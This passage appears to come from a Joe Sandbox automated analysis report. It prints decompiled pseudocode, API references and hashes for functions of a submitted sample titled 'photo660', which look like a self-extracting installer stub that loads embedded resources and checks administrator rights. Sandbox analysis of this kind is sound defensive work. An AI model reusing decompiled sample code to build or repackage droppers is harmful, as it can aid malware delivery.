• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 31a0bf387cb5443ef11fd86ffa56f7641f4254620e61a037bfdc37cc179b9427
                                                                                                                                                                                                        • Instruction ID: cfbbc790c81df90abe10ddf163151cd6ec4f97964570503a6dbc2f0447ebf9d5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31a0bf387cb5443ef11fd86ffa56f7641f4254620e61a037bfdc37cc179b9427
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81312C71A00209AFDB209FA9DC98FAFBBFCFF09745F100869E545E2151DB719906CB62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00BC468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$photo660
                                                                                                                                                                                                        • API String ID: 3370778649-2621105198
                                                                                                                                                                                                        • Opcode ID: 8b6011b3d9d847ae50f50af62d352a5c919e1d155e44f8945418ff1a29e0a948
                                                                                                                                                                                                        • Instruction ID: af7c8c22cafa1ba5fb1b32f9a252c6f9bc906a070ac24e81bbf6f8c8bc1e1037
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b6011b3d9d847ae50f50af62d352a5c919e1d155e44f8945418ff1a29e0a948
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE01A9362442147BF31017A55C4DF6B7E6CDBCEF96F040068FA4AD7150CE71894186B6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00BC17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xbca288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00BC18DD), ref: 00BC181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00BC182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00BC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BC18DD), ref: 00BC1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00BC18DD), ref: 00BC1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00BC18DD), ref: 00BC188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: e64c6ab5e639ac193a5f370481138e0ad634417d80d1cf30e54f9e082ee47960
                                                                                                                                                                                                        • Instruction ID: 79a7bbd7bcc8aa7ed3ab02898b57b19cfaeb3d71af11e89b4e4e667bb768e887
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e64c6ab5e639ac193a5f370481138e0ad634417d80d1cf30e54f9e082ee47960
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5118171E00209ABDB109FA4DC49FBEBBB8EB49745F10056DFA11F3291DE309D008BA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00BC43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "photo660");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xbc9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xbc91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00BC3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00BC34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00BC34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00BC34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 852535152-1757243477
                                                                                                                                                                                                        • Opcode ID: bcaadf956081cc73c1446e7d4972d8d000a033819a7783361135c19169cb5da6
                                                                                                                                                                                                        • Instruction ID: 423aa8ca039e26746a188455d5b9869dee8a8a78c310fa9c92cf0579b90fd29b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcaadf956081cc73c1446e7d4972d8d000a033819a7783361135c19169cb5da6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F01B131240118ABE71E5F69DC0CE6D3AE5EB4AB04F448058F946A76A0CF308F41DB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xbc9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00BC1680(_t65, E00BC17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00BC65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00BC1680(_t65, E00BC17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00BC2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00BC2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00BC2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00BC2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00BC2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00BC2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 7041546bc83616ef33c2f8c8caff389e13901124ac97319649ed56991fdd5d77
                                                                                                                                                                                                        • Instruction ID: 82b2f47a19044defdcc44a7a5809a404a467a6c08ed63dd477f0307011723a61
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7041546bc83616ef33c2f8c8caff389e13901124ac97319649ed56991fdd5d77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F341BF345042495EDB159F349854FBE7BE9DF5B314F1800DEE8C297202DF758E868B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00BC43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00BC440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00BC4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00BC442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00BC443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00BC4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00BC44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: c9eb54818659cb5f1261a661d6c9d6cc7337756c1acaef694e5cdf2843101031
                                                                                                                                                                                                        • Instruction ID: f49224fe5bcfbff648924b66cfbc429494d609ddb98e193ac916f04f31e55cce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9eb54818659cb5f1261a661d6c9d6cc7337756c1acaef694e5cdf2843101031
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23312D72E00119AFCB14CFB8DD99DEEBBB5EB89314F254169F805F3250DA306D058B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E00BC6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E00BC171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0xbc9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
